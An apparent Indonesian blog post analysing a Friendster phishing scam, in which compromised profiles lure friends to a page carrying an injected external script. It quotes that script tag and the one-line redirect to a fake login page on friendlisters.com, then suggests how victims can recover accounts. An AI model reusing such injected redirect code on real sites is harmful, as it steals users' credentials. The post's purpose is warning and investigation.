Masalah phising friendster lagi. Profil Novia dan testi Adit

Mungkin ada yang udah nelusurin juga
Kebetulan Ali, gw ama icha, sempet penasaran ama testi adit di profil novia,
karna kami bertiga termasuk dapet message novia.


Mungkin ada yang dapet juga, isi messagenya begini:

Hai kemana aja nih ?
Eh lo kenal ma Adit yang testi gw gak ?
Please liat testi gw bentar dong.
Makasih yaa.




Bingung gw, si Novia kaya sok ga kenal aja sama gw...
Ternyata bener, si Ali dan Icha juga dikirim message serupa




Trus hasilnya kira-kira gini:


Biar lebih enak, sebelum buka profilenya novia, javascript di browsernya di nonaktifin dulu.


Kalo dah kebuka, coba di view source, trus find dengan keyword "friendlisters"

Kira-kira lengkapnya begini:

<script src="http://www.friendlisters.com/fs/link.txt"></script>




Dengan kata lain, webpage profilnya novia itu mengEmbeed external file, dengan nama link.txt

Sekarang kita donlot link.txt itu.
Ternyata isinya:
parent.document.location = 'http://www.friendlisters.com/fs/friendster.html'
Dengan kata lain, javascript ini melakukan redirect page parent ke alamat login friendster itu. Coba aja buka:
http://www.friendlisters.com/fs/friendster.html
Nah, mungkin disinilah, orang yang iseng ini mengharapkan ada user yang memasukan username serta passwordnya.

Selanjutnya, mungkin dia login ke beberapa user terserbut,
kemudian mengganti passwordnya,
dan melakukan send email secara masal.
(mungkin)




Untuk kasus della & kiwil yang ga bisa login lagi gw gatau.
Mungkin beda ama yang profil novia

Coba deh, lo kirim message ke staf friendsternya untuk kasus login problem.
Trus lo minta aja mentracking aktifitas account FS lo beberapa waktu terakhir (terutama kapan ganti passwordnya)
Jangan lupa, ngirim emailnya dari email yang lo daftarin ke FS. Agar mereka percaya elo yang punya account aslinya.
Mungkin ini ulah orang kurang kerjaan, atau mungkin juga friendsternya lagi ga beres.

mungkin.....
mangga kalo ada yang mau ngelanjutin

1 comment: